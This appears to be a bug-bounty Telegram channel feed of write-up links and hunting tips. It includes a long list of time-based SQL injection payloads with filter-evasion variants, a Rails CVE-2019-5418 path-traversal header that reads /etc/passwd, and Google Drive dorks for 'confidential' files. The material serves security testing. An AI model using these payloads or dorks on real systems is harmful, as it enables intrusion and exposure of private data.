Bug Bounty - GitBook
Open in Telegram
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
Show more7 460
Subscribers
+524 hours
+307 days
+17430 days
Posts Archive
7 462
Critical SQL Injection Vulnerability in Apache Traffic Control: https://medium.com/@wiretor/critical-sql-injection-vulnerability-in-apache-traffic-control-a28cedca8b93?source=rss------bug_bounty-5
7 462
Traditional Pentest vs. Bug Bounty Program: The Pros, The Cons, and How to Do It Right: https://medium.com/@hackrate/traditional-pentest-vs-bug-bounty-program-the-pros-the-cons-and-how-to-do-it-right-f2d8beff40bf?source=rss------bug_bounty-5
7 462
Cross-Site Scripting (XSS): Techniques, Bypasses, and Detection: https://medium.com/@rootast/cross-site-scripting-xss-techniques-bypasses-and-detection-927af5a55d02?source=rss------bug_bounty-5
7 462
The Ultimate Checklist for Detecting IDOR and Broken Access Control Vulnerabilities: https://thexssrat.medium.com/the-ultimate-checklist-for-detecting-idor-and-broken-access-control-vulnerabilities-b1585dd4e999?source=rss------bug_bounty-5
7 462
API Pentesting: Broken Object Property Level Authorization: https://devilwrites.medium.com/api-pentesting-broken-object-property-level-authorization-21d65939ad24?source=rss------bug_bounty-5
7 462
Bug Critical Flaw: Default Password to Super Admin!: https://medium.com/@firdansp/bug-critical-flaw-default-password-to-super-admin-ef20c4214231?source=rss------bug_bounty-5
7 462
From Broken Access Control to First Bounty: https://infosecwriteups.com/from-broken-access-control-to-first-bounty-01712b1dab53?source=rss------bug_bounty-5
7 462
If you hate wasting time with 2FA, try this:
1. Install github.com/rsc/2fa on your computer/VPS & configure it with your 2FA sites.
2. Install Espanso, then add the config below.
Now, whenever you need an OTP, just type :otp and it’ll auto-fill. Easy and fast!
Credit- sw33tLie
7 462
🔖2FA bugs setup/implementation, bypass and disable.
🔗 What is two-factor authentication?
🌐 Cloudflare
🔗 Multi-factor Authentication Labs:
🌐 Portswigger
🔗 2FA/MFA/OTP Bypass:
🌐 Hacktricks
🔗 Testing 2 Factor Authentication:
📱Github
🔗 Account Takeover (2FA Bypasses):
📱Github
7 462
☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
🛍https://github.com/errorfiathck/IDOR-Forge
7 462
⚠️Google Drive Dorks
site:http://drive.google.com inurl:folder
site:http://drive.google.com inurl:open
site:http://docs.google.com inurl:d
site:http://drive.google.com "confidential"
site:http://docs.google.com inurl:d filetype:docx
7 462
🌟One-Liner - Extract all URLs from the Source Code
curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'🔔@0x0SojalSec
7 462
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='7 462
⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.
Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{
🛍If the server is deemed to be vulnerable, but a WAF is present:
../../../../../../e*c/p*s*d{{
✔️Credit- nav1n0x
7 462
⚡Ultimate FFUF Cheat Sheet!
🔗https://medium.com/h7w/ultimate-ffuf-cheatsheet-advanced-fuzzing-tactics-for-pro-bug-hunters-492598750150
